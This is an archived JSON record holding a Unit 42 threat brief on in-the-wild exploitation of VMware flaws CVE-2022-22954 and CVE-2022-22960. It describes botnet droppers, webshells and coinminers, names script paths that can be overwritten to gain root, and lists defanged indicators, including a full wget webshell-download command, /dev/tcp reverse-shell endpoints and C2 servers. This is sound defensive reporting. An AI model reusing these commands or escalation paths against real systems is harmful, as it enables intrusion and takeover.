{
	"id": "338524c1-c672-4b99-a27e-b60bb0d461d8",
	"created_at": "2026-04-06T01:32:29.600993Z",
	"updated_at": "2026-04-10T03:20:24.663626Z",
	"deleted_at": null,
	"sha1_hash": "a39e774f1817e909ace667e74e3fdd2a3e37a720",
	"title": "Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 332897,
	"plain_text": "Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)\r\nBy Ruchna Nigam\r\nPublished: 2022-05-20 · Archived: 2026-04-06 00:20:41 UTC\r\nExecutive Summary\r\nOn April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-\r\n22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and\r\nvRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being\r\nexploited in the wild.\r\nMultiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the\r\nlast week of April, finally followed by a CISA Alert on May 18. The CISA Alert also calls out CVE-2022-22972\r\nand CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be\r\nexploited.\r\nUnit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild. In this blog post, we\r\nshare context around this observed activity, along with how the Palo Alto Networks product suite can be leveraged\r\nto protect against it.\r\nTimeline for VMware Vulnerabilities\r\n2022-04-06:\r\nPublication of VMware advisory VMSA-2022-0011 regarding CVE-2022-22954, CVE-2022-22955,CVE-2022-\r\n22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961.\r\n2022-04-11:\r\nProofs of concept available on GitHub. This is also the earliest date at which Unit 42 observed exploitation\r\nattempts and scanning activity.\r\n2022-04-13:\r\nVMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.\r\n2022-05-18:\r\nPublication of VMware advisory VMSA-2022-0014 regarding CVE-2022-22972, CVE-2022-22973. Publication\r\nof CISA Alert.\r\nAs of this writing, no proofs of concept for exploitation of CVE-22972 or CVE-2022-22973 are known. This post\r\nwill be updated with new findings as they are discovered.\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 1 of 7\n\nCVE-2022-22954 in the Wild\r\nCVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware\r\nWorkspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable\r\ndevice.\r\nThe list below details the exploits Unit 42 observed targeting this vulnerability that we deemed worth highlighting.\r\nDirect Downloads\r\nThe injected commands worth mentioning that intended to further download payloads to a vulnerable machine can\r\nbe categorized into the following broad categories:\r\nMirai/Gafgyt dropper scripts or variants\r\nWebshells\r\nPerl Shellbot\r\nCoinminers\r\nScanning/Callbacks\r\nMirai/Gafgyt Dropper Scripts or Variants\r\nWe observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware. In most\r\ncases, the exploit was only used to drop the payload, however the payloads themself did not contain CVE-2022-\r\n22954 exploits for further propagation. Instead, they were either non-specific Mirai variants or contained\r\npreviously known exploits such as CVE-2017-17215.\r\nThe exception to this is Enemybot, a currently prevalent botnet built with bits of code from both Gafgyt and Mirai\r\nsource code. The exploits involving Enemybot eventually download Enemybot samples that themselves embed\r\nCVE-2022-22954 exploits for further exploitation and propagation.\r\nWebshells\r\nWe observed the vulnerability exploited to download webshells, including:\r\nA basic implementation that read a GET parameter value, Base64 decoded it, and used a ClassLoader to\r\nload the result.\r\nThe Godzilla Webshell that has also been used in previous campaigns exploiting other vulnerabilities.\r\nPerl Shellbot\r\nCertain injected commands result in the download of obfuscated Perl scripts. Deobfuscating these scripts reveals\r\nthey are versions of the known bot family “Stealth Shellbot” that reaches out to an IRC server to listen for\r\ncommands to perform. It has the ability to further make HTTP requests based on commands received. This would\r\nmean infected machines could then be directed to further perform scanning and exploitation activity, in addition to\r\ndirectly executing shell commands received from the command and control (C2) server on the target machine.\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 2 of 7\n\nA complete list of indicators of compromise (IoCs) can be found at the end of this post.\r\nBase64 Injections\r\nFigure 1. An example of Base64 injection observed in the wild.\r\nFigure 2. An example of Base64 injection observed in the wild.\r\nFigure 3. An example of Base64 injection observed in the wild.\r\nThis last command downloads a shell script that ultimately downloads and executes an XMRig coinminer.\r\nSSH Key Targeting\r\nWe also observed some instances of injected payloads that were either trying to read authorized keys on vulnerable\r\nmachines or were writing into the authorized_keys file to add to the machine’s list of accepted keys. Following is\r\nan example of such an attempt.\r\nFigure 4. An example of an injected payload trying to affect authorized keys.\r\nCVE-2022-22960 in the Wild\r\nCVE-2022-22960 is a privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager\r\nand vRealize Automation instances, due to improper permissions in support scripts. The vulnerability can be\r\nleveraged to run commands as a root user on a vulnerable instance.\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 3 of 7\n\nMore specifically, this flaw exists since the default user for these VMware products, horizon, has access to several\r\nsudo commands, some of which involve paths that can be overwritten as well.\r\nAttackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths. If\r\nsuccessful, CVE-2022-22960 can then be leveraged to execute these overwritten paths with root permissions using\r\nthe sudo command.\r\nOur research so far has shown one publicly known sample demonstrating exploitation of CVE-2022-22960 by\r\noverwriting the /usr/local/horizon/scripts/publishCaCert.hzn file.\r\nThe content of this exploit file can be observed below. \r\nFigure 5. An example of an attempt to exploit CVE-2022-22960 observed in the wild.\r\nAnother proof of concept code sample is additionally available targeting the following 2 filepaths:\r\n/opt/vmware/certproxy/bin/certproxyService.sh\r\n/usr/local/horizon/scripts/diagnostic/getPasswordExpiry.hzn\r\nConclusion\r\nPalo Alto Networks is still actively investigating a number of the aforementioned vulnerabilities, many of which\r\ndo not have publicly available exploit code. Presently, customers may leverage the following to block or detect the\r\nthreats communicated throughout this publication:\r\nPalo Alto Networks Next Generation Firewall Threat Prevention blocks CVE-2022-22954 exploits with Signature\r\n92483.\r\nCortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public\r\ninternet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.\r\nWildFire and Cortex XDR categorize all samples of supported file types as malware.\r\nAdditionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering\r\nURL database.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 4 of 7\n\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nAs further information or detections are put into place, Palo Alto Networks will update this publication\r\naccordingly.\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their\r\ncustomers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nMirai/Gafgyt dropper scripts or variants\r\nhxxp://51[.]81.133.91/FKKK/NW_BBB.x86\r\nhxxp://198[.]46.189.105:80/Ugliest.x86\r\nhxxp://135[.]148.91.146:1980/bins.sh\r\nhxxp://80[.]94.92.38/folder/enemybotarm64/\r\nhxxp://80[.]94.92.38/folder/enemybotx86/\r\nhxxp://80[.]94.92.38/folder/enemybotx64/\r\nPerl Shellbot\r\n193[.]56.28.202/.d/bot.v\r\n193[.]56.28.202/.d/bot.redis\r\n193[.]56.28.202/.d/botVNC\r\nCoinminer activity\r\nhxxp://185[.]157.160.214/xms\r\nhxxp://103[.]64.13.51:8452/cnm\r\nhxxp://113[.]185.0.244/wls-wsat/root\r\nWebshell downloads (full injected command)\r\nwget%20-\r\nO%20/opt/vmware/horizon/workspace/webapps/ROOT/error/report1.jsp%20hxxp://103[.]43.18.15:8089/13.jsp\r\nCallback/Scanning activity\r\nhxxps://enlib2w9g8mze[.]x.pipedream.net\r\nDirect Download exploits where payloads were no longer live at the time of analysis:\r\nhxxp://106[.]246.224.219/one\r\n/dev/tcp/101[.]42.89.186/1234\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 5 of 7\n\nhxxp://192[.]3.1.223/favicon.ico\r\nhxxp://20[.]205.61.88/payllll.sh\r\n45[.]149.77.39:80\r\nhxxps://tmpfiles[.]org/dl/262822/a.txt\r\nhxxps://tmpfiles[.]org/dl/266116/vmware_log.jsp\r\nhxxps://tmpfiles[.]org/dl/262853/vmware_log.jsp\r\nhxxps://tmpfiles[.]org/dl/265385/xmrigdaemon\r\nhxxps://tmpfiles[.]org/dl/265351/shell.py\r\nhxxps://tmpfiles[.]org/dl/265326/cmd.jsp\r\nhxxp://107[.]191.43.86/start\r\nhxxp://107[.]148.13.247/4file\r\nhxxp://107[.]148.13.247/error.txt\r\nhxxp://107[.]148.13.247:7777/file\r\nhxxp://107[.]148.12.162:12345/log\r\nhxxp://45[.]144.179.204:9999/log\r\n/dev/tcp/193[.]56.28.202/443\r\n/dev/tcp/193[.]56.28.202/444\r\nhxxps://129[.]226.227.246/help.txt\r\nhxxps://20[.]232.97.189/up/4102909932.sh\r\nhxxps://20[.]232.97.189/up/d1bea27b13.sh\r\nhxxps://20[.]232.97.189/up/388e6567d5.sh\r\nhxxp://138[.]68.61.82:444\r\nSample hashes\r\n801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637\r\n6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b\r\n940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8\r\nfdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05\r\n85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03\r\nbot.v\r\n0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba\r\nC2 server : 5[.]39.217.212:80\r\nChannel : #vcenter getsome\r\nbot.redis\r\n48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b\r\nC2 server : 64[.]32.6.143:80\r\nChannel : #redis getsome\r\nbotVNC\r\nc399b56e1baf063ca2c8aadbbe4a2b58141916aac8ef790a9c29762ed1956bd5\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 6 of 7\n\nC2 server : 5[.]39.217.212:80\r\nChannel : #D getsome\r\n7e29615126585b9f87ded09cfae4724bb5d7896c7daf2adfcef775924549e49b\r\n099ac2f3e10346dbef472b2a7b443ebfe1f6011a9a2518a54c20aad07fe9ec61\r\nUpdated May 23, 2022, at 1 p.m. PT. \r\nSource: https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nhttps://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/"
	],
	"report_names": [
		"cve-2022-22954-vmware-vulnerabilities"
	],
	"threat_actors": [],
	"ts_created_at": 1775439149,
	"ts_updated_at": 1775791224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a39e774f1817e909ace667e74e3fdd2a3e37a720.pdf",
		"text": "https://archive.orkl.eu/a39e774f1817e909ace667e74e3fdd2a3e37a720.txt",
		"img": "https://archive.orkl.eu/a39e774f1817e909ace667e74e3fdd2a3e37a720.jpg"
	}
}